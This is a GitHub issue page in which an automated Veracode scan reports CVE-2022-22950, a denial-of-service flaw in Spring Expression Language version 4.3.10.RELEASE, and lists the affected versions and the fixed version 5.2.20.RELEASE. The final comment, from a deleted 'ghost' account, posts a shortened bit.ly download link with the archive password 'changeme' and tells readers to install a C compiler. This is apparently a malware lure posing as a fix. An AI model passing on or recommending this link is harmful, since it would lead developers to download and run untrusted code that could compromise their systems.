julz0815 / test-action

0 stars 1 forks source link

CVE: 2022-22950 found in Spring Expression Language (SpEL) - Version: 4.3.10.RELEASE [JAVA] #1190

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Expression Language (SpEL)
Description Spring Expression Language (SpEL)
Language JAVA
Vulnerability Denial Of Service (DoS)
Vulnerability description Spring Expression is vulnerable to denial of service. The vulnerability exists due to the creation of large array in a SpEL and sending meaningless error messages to the user which allows an attacker to send crafted SpEL expressions that leads to an out ouf bound error causing an application crash.
CVE 2022-22950
CVSS score 4
Vulnerability present in version/s 3.0.4.RELEASE-5.2.19.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 5.2.20.RELEASE
Library latest version 6.2.0-RC1
Fix

Links:

ghost commented 2 months ago

download https://bit.ly/3TC7hrw

Password: changeme If you don't have the c compliator, install it.(gcc or clang)